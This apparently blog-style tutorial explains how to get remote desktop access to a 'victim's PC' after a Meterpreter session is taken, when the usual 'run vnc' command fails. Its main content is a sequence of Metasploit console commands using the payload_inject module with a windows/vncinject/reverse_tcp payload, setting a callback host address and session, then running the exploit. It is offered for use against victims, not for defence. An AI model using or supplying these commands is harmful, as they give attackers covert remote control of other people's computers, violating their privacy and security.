This
article contains post exploitation method. To run following commands
successfully first take a session of meterpreter and then follow the commands
In
this digital era, more and more people are becoming aware of security and the
all the companies take the responsibility to increase their security. Hence,
technology is being upgraded every single second. Therefore, it is becoming
difficult to hack the modern technology. But where there is will; there is a
way.
We
all know that every problem comes with a solution, and so is our following
problem:
While
taking control over our victim’s PC,
often due to security measures some of
our commands does not work such as run
vnc and so, we might come across such error:
In
such case, there is a special payload especially for vnc. Whenever you face such problem use following exploit:
msf
exploit (payload_inject)>set payload windows/vncinject/reverse_tcp
msf
exploit (payload_inject)>set lhost 192.168.0.18
msf
exploit (payload_inject)>set session 1
msf
exploit (payload_inject)>exploit
After
executing you can see the following result:
0 comments:
Post a Comment